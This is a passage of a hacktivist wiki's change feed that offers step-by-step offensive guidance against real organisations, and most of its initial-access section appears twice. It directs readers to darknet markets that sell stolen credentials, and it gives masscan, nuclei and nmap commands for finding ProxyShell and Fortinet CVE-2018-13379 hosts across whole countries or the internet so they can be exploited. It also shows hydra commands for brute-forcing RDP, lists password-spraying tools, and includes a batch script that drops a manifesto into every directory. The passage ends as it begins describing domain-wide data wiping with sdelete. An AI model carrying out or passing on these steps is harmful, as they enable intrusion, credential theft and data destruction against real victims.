* https://github.com/openwall/john&lt;br /&gt;
* https://github.com/NotSoSecure/password_cracking_rules&lt;br /&gt;
&lt;br /&gt;
== Buying access ==&lt;br /&gt;
&lt;br /&gt;
You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.&lt;br /&gt;
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]&lt;br /&gt;
&lt;br /&gt;
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).&lt;br /&gt;
&lt;br /&gt;
* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])&lt;br /&gt;
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])&lt;br /&gt;
&lt;br /&gt;
== Spray and pray ==&lt;br /&gt;
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.&lt;br /&gt;
&lt;br /&gt;
=== Prerequisites ===&lt;br /&gt;
There are some prerequisites you will need to follow the below examples:&lt;br /&gt;
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])&lt;br /&gt;
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]&lt;br /&gt;
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session&lt;br /&gt;
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].&lt;br /&gt;
&lt;br /&gt;
=== Networks ===&lt;br /&gt;
==== Vulnerability Scanning ====&lt;br /&gt;
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.&lt;br /&gt;
&lt;br /&gt;
Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;IP Ranges&#039;&#039;&#039;:&lt;br /&gt;
* List of IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges&lt;br /&gt;
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks&lt;br /&gt;
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0&lt;br /&gt;
&lt;br /&gt;
===== Proxyshell =====&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/robertdavidgraham/masscan masscan]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;sed -i &#039;s/$/:443/&#039; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Exploit Discovered hosts: [[Proxyshell]]&lt;br /&gt;
&lt;br /&gt;
===== CVE-2018-13379 =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;awk &#039;{ print $4 &amp;quot;:&amp;quot; $3 }&#039; results.txt &amp;gt; final_results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/zmap/zmap zmap]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for Microsoft Exchange E-mail Servers:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sudo zmap -q -p 443 | httpx -silent -s -sd -location \&lt;br /&gt;
&amp;gt; | awk &#039;/owa/ { print substr($1,9) }&#039; &amp;gt; owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE] &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -p 443 -Pn -n \&lt;br /&gt;
&amp;gt; --script http-vuln-exchange-proxyshell.nse -iL owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]&lt;br /&gt;
&lt;br /&gt;
===== Domains =====&lt;br /&gt;
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.&lt;br /&gt;
&lt;br /&gt;
See [[Domain Spray and Pray]] scanning.&lt;br /&gt;
&lt;br /&gt;
==== Password Attacks ====&lt;br /&gt;
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.&lt;br /&gt;
&lt;br /&gt;
===== RDP =====&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== VPN =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Virtual Private Network (VPN) Brute forcing:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1729</id>
		<title>Initial Access Tactics, techniques and procedures</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1729"/>
		<updated>2024-03-30T12:12:09Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* Services */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Phishing ==&lt;br /&gt;
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.&lt;br /&gt;
&lt;br /&gt;
==== Tools ====&lt;br /&gt;
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html&lt;br /&gt;
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165&lt;br /&gt;
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55&lt;br /&gt;
* https://www.xanthus.io/mastering-the-simulated-phishing-attack&lt;br /&gt;
* https://github.com/Arno0x/EmbedInHTML&lt;br /&gt;
* https://github.com/L4bF0x/PhishingPretexts&lt;br /&gt;
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html&lt;br /&gt;
* https://book.hacktricks.xyz/phishing-methodology&lt;br /&gt;
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective&lt;br /&gt;
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/&lt;br /&gt;
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/&lt;br /&gt;
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* https://github.com/curtbraz/PhishAPI&lt;br /&gt;
* https://github.com/edoverflow/can-i-take-over-xyz&lt;br /&gt;
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/&lt;br /&gt;
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office&lt;br /&gt;
&lt;br /&gt;
== Password Attacks ==&lt;br /&gt;
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show&#039;s the world that you don&#039;t need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!&lt;br /&gt;
&lt;br /&gt;
If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.&lt;br /&gt;
&lt;br /&gt;
=== Usernames ===&lt;br /&gt;
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/digininja/CeWL&lt;br /&gt;
* https://github.com/Mebus/cupp&lt;br /&gt;
* https://github.com/digininja/RSMangler&lt;br /&gt;
* https://github.com/sc0tfree/mentalist&lt;br /&gt;
* https://github.com/urbanadventurer/username-anarchy&lt;br /&gt;
* https://github.com/vysecurity/LinkedInt&lt;br /&gt;
* https://github.com/initstring/linkedin2username&lt;br /&gt;
* https://github.com/shroudri/username_generator&lt;br /&gt;
&lt;br /&gt;
=== Passwords ===&lt;br /&gt;
Common and leaked credentials to test login portals and network services.&lt;br /&gt;
&lt;br /&gt;
==== Default passwords ====&lt;br /&gt;
* https://cirt.net/passwords&lt;br /&gt;
* https://default-password.info&lt;br /&gt;
* https://datarecovery.com/rd/default-passwords&lt;br /&gt;
* https://github.com/ihebski/DefaultCreds-cheat-sheet&lt;br /&gt;
&lt;br /&gt;
==== Common and leaked passwords ====&lt;br /&gt;
* https://wiki.skullsecurity.org/index.php?title=Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases&lt;br /&gt;
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt&lt;br /&gt;
&lt;br /&gt;
=== Password cracking tools ===&lt;br /&gt;
&lt;br /&gt;
* https://github.com/byt3bl33d3r/SprayingToolkit&lt;br /&gt;
* https://www.kali.org/tools/hydra&lt;br /&gt;
* https://www.kali.org/tools/brutespray&lt;br /&gt;
* https://www.kali.org/tools/medusa&lt;br /&gt;
* https://www.kali.org/tools/patator&lt;br /&gt;
* https://github.com/1N3/BruteX&lt;br /&gt;
&lt;br /&gt;
=== Searching leaks ===&lt;br /&gt;
* https://github.com/khast3x/h8mail [Free but includes paid services]&lt;br /&gt;
&lt;br /&gt;
==== Services ====&lt;br /&gt;
&#039;&#039;&#039;Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.&lt;br /&gt;
&lt;br /&gt;
* https://haveibeenpwned.com&lt;br /&gt;
* https://exposed.lol&lt;br /&gt;
* https://leak-lookup.com [Paid. Accepts crypto (XMR &amp;amp; BTC)]&lt;br /&gt;
* https://dehashed.com [Paid. Accepts crypto (BTC)]&lt;br /&gt;
&lt;br /&gt;
Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.&lt;br /&gt;
&lt;br /&gt;
=== Password spraying ===&lt;br /&gt;
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.&lt;br /&gt;
 &lt;br /&gt;
* https://github.com/dafthack/MSOLSpray&lt;br /&gt;
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying&lt;br /&gt;
* https://github.com/blacklanternsecurity/TREVORspray&lt;br /&gt;
* https://github.com/knavesec/CredMaster&lt;br /&gt;
* https://github.com/xFreed0m/RDPassSpray&lt;br /&gt;
* https://github.com/dafthack/MailSniper&lt;br /&gt;
&lt;br /&gt;
=== Hash cracking ===&lt;br /&gt;
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!&lt;br /&gt;
&lt;br /&gt;
==== Identify hash ====&lt;br /&gt;
* https://github.com/blackploit/hash-identifier&lt;br /&gt;
&lt;br /&gt;
==== Online tools ====&lt;br /&gt;
* https://hashes.com/en/decrypt/hash [Free &amp;amp; Paid]&lt;br /&gt;
* https://crackstation.net&lt;br /&gt;
&lt;br /&gt;
==== Offline tools ====&lt;br /&gt;
* https://github.com/hashcat/hashcat&lt;br /&gt;
* https://github.com/openwall/john&lt;br /&gt;
* https://github.com/NotSoSecure/password_cracking_rules&lt;br /&gt;
&lt;br /&gt;
== Buying access ==&lt;br /&gt;
&lt;br /&gt;
You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.&lt;br /&gt;
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]&lt;br /&gt;
&lt;br /&gt;
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).&lt;br /&gt;
&lt;br /&gt;
* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])&lt;br /&gt;
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])&lt;br /&gt;
&lt;br /&gt;
== Spray and pray ==&lt;br /&gt;
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.&lt;br /&gt;
&lt;br /&gt;
=== Prerequisites ===&lt;br /&gt;
There are some prerequisites you will need to follow the below examples:&lt;br /&gt;
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])&lt;br /&gt;
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]&lt;br /&gt;
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session&lt;br /&gt;
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].&lt;br /&gt;
&lt;br /&gt;
=== Networks ===&lt;br /&gt;
==== Vulnerability Scanning ====&lt;br /&gt;
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.&lt;br /&gt;
&lt;br /&gt;
Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;IP Ranges&#039;&#039;&#039;:&lt;br /&gt;
* List of IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges&lt;br /&gt;
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks&lt;br /&gt;
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0&lt;br /&gt;
&lt;br /&gt;
===== Proxyshell =====&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/robertdavidgraham/masscan masscan]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;sed -i &#039;s/$/:443/&#039; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Exploit Discovered hosts: [[Proxyshell]]&lt;br /&gt;
&lt;br /&gt;
===== CVE-2018-13379 =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;awk &#039;{ print $4 &amp;quot;:&amp;quot; $3 }&#039; results.txt &amp;gt; final_results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/zmap/zmap zmap]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for Microsoft Exchange E-mail Servers:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sudo zmap -q -p 443 | httpx -silent -s -sd -location \&lt;br /&gt;
&amp;gt; | awk &#039;/owa/ { print substr($1,9) }&#039; &amp;gt; owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE] &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -p 443 -Pn -n \&lt;br /&gt;
&amp;gt; --script http-vuln-exchange-proxyshell.nse -iL owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]&lt;br /&gt;
&lt;br /&gt;
===== Domains =====&lt;br /&gt;
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.&lt;br /&gt;
&lt;br /&gt;
See [[Domain Spray and Pray]] scanning.&lt;br /&gt;
&lt;br /&gt;
==== Password Attacks ====&lt;br /&gt;
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.&lt;br /&gt;
&lt;br /&gt;
===== RDP =====&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== VPN =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Virtual Private Network (VPN) Brute forcing:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Chaos_and_Destruction&amp;diff=1728</id>
		<title>Chaos and Destruction</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Chaos_and_Destruction&amp;diff=1728"/>
		<updated>2024-03-25T17:54:02Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* Wiping Linux System */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Companies have large networks consisting of both Windows and Linux systems, so if your end goal is not only leaking data to journalists but to also destroy your target then using a wiper will be the best way to achieve this goal, just make sure not to wipe critical services that may impact someones physical safety as demonstrated in [https://enlacehacktivista.org/hackback.webm Guacamaya&#039;s HackBack] video, we want to destroy data, not harm human life.&lt;br /&gt;
&lt;br /&gt;
== Windows ==&lt;br /&gt;
=== Print your manifesto ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
@echo off&lt;br /&gt;
set &amp;quot;manifesto=C:\Users\Administrator\AppData\Local\Temp\manifesto.txt&amp;quot;&lt;br /&gt;
for /r &amp;quot;C:\&amp;quot; %%d in (.) do (&lt;br /&gt;
    xcopy &amp;quot;%manifesto%&amp;quot; &amp;quot;%%d\&amp;quot; /Y&lt;br /&gt;
)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Wiping Windows Domain ===&lt;br /&gt;
When it comes time to destroy your targets network as demonstrated by the [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T Hack Back video Guacamaya made] it&#039;s best to use [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] as it&#039;s a Microsoft developed and signed application removing the need to disable security controls before it&#039;s spread and execution. Below we showcase various different methods to weaponize sdelete64.exe application across the network of your target.&lt;br /&gt;
&lt;br /&gt;
==== Method 1 - GPO &amp;amp; Schtasks ====&lt;br /&gt;
Using Group Policy Objects (GPO) and Scheduled tasks to spread sdelete64.exe across a domain&lt;br /&gt;
